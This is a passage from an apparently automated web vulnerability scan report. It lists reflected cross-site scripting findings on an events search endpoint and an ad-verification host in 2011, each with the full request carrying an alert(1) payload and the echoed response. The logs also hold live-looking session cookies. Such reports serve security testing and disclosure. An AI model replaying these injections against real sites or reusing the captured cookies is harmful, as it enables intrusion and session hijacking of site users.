Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:35 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 455
ETag: "2db2f2300aa255ecfb1ee8c22ab5041a"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: b145210b425eb01eee94d1c7b06bfb5dc9c830e7
Z-REQUEST-HANDLED-BY: www28
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2131

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"The Freedom Party NYC","has_tickets":false,"tickets_on_sale":null,"venue_id":861747,"id":199524386,"images":[{"url":"http://www.zvents.com/images/internal/5/4/7/5/img_11635745_thumba2960<script>alert(1)</script>23d031d555e.jpg?resample_method=scaled","height":null,"width":null}],"starttime":"Fri Aug 12 23:00:00 UTC 2011","zurl":"/new-york-ny/events/show/199524386-the-freedom-party-nyc"},{"name":"Pacha Teen Night with Dj
...[SNIP]...

4.62. http://events.nydailynews.com/partner_json/search [jsonsp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.nydailynews.com
Path:	/partner_json/search

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 8b9c9<script>alert(1)</script>deca5adb594 was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=5%2C6%2C7%2C62%2C63%2C64&radius=75&where=New+York%2C+NY&tag=&when=next+30+days&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_08b9c9<script>alert(1)</script>deca5adb594 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:36:11 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 92
ETag: "ef147786317863042bcdeb82556459d0"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: be1188d01917925547700abedbea482ea7c8b840
Z-REQUEST-HANDLED-BY: www12
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 1958

jsp_08b9c9<script>alert(1)</script>deca5adb594('callback({"rsp":{"status":"ok","content":{"events":[{"name":"2011 Lincoln Center Out Of Doors: 28th Annual Roots of American Music Festival","has_tickets":false,"tickets_on_sale":null,"venue_id":2181
...[SNIP]...

4.63. http://events.nydailynews.com/partner_json/search [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.nydailynews.com
Path:	/partner_json/search

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 6019a<script>alert(1)</script>64a6f8607b8 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=5%2C6%2C7%2C62%2C63%2C64&radius=75&where=New+York%2C+NY&tag=&when=next+30+days&what=&nbh=&rand_spn=5&st=event6019a<script>alert(1)</script>64a6f8607b8&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:36:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 11
ETag: "e4fa1ff862b60744626a3b07ce01b240"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: da1f8520773bf64cff87fdc83099acf06489f7b0
Z-REQUEST-HANDLED-BY: www21
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 131

{"rsp":{"status":"failed","msg":"Invalid search: event6019a<script>alert(1)</script>64a6f8607b8 is not a valid search category."}}

4.64. http://events.nydailynews.com/partner_json/search [when parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.nydailynews.com
Path:	/partner_json/search

Issue detail

The value of the when request parameter is copied into the HTML document as plain text between tags. The payload d5cfb<script>alert(1)</script>2dd8a5df4aa was submitted in the when parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=5%2C6%2C7%2C62%2C63%2C64&radius=75&where=New+York%2C+NY&tag=&when=next+30+daysd5cfb<script>alert(1)</script>2dd8a5df4aa&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:53 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 19
ETag: "e3834b5cda8e7aef83a32aa6f27b09ac"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: 19ae35a7fb298d27c4555c7da507d4f846376446
Z-REQUEST-HANDLED-BY: www30
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 476

{"rsp":{"status":"failed","msg":"Unrecognized date format: next 30 daysd5cfb<script>alert(1)</script>2dd8a5df4aa is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...

4.65. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e72ac"-alert(1)-"9131707641a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjsi/dce72ac"-alert(1)-"9131707641a/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=46E994820BEA60E036BF5BE397EDBBC0; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:34 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dce72ac"-alert(1)-"9131707641a/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requr
...[SNIP]...

4.66. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10fb9"-alert(1)-"6e53e38484e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjsi/dc/1044910fb9"-alert(1)-"6e53e38484e/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5469F15AA88EEE3255E56F24ACA66C81; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:34 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/1044910fb9"-alert(1)-"6e53e38484e/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : ""
...[SNIP]...

4.67. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44c9e"-alert(1)-"e76675c569d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjsi/dc/10449/14581744c9e"-alert(1)-"e76675c569d/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:35 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
p%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10449/14581744c9e"-alert(1)-"e76675c569d/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : "",
   reqq
...[SNIP]...

4.68. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac792"-alert(1)-"f774c7feed6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjsi/dc/10449/145817/adiac792"-alert(1)-"f774c7feed6/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=49CCDDF0805E1F3B79B8DDA62CB254A9; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:35 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10449/145817/adiac792"-alert(1)-"f774c7feed6/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : "",
   reqquery
...[SNIP]...

4.69. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9e4b"-alert(1)-"80809c3de6e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjsi/dc/10449/145817/adi/N5823.InterCLICKc9e4b"-alert(1)-"80809c3de6e/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77AF6CFE5EC6234805A7DAAF7F27D4BF; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:36 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
news.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10449/145817/adi/N5823.InterCLICKc9e4b"-alert(1)-"80809c3de6e/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "
...[SNIP]...

4.70. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c076e"-alert(1)-"297be020030 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5c076e"-alert(1)-"297be020030;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D7490E4F1316D12659D2939747B9E325; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:35 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
index.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5c076e"-alert(1)-"297be020030;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   al
...[SNIP]...

4.71. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acf01"-alert(1)-"2215212b286 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

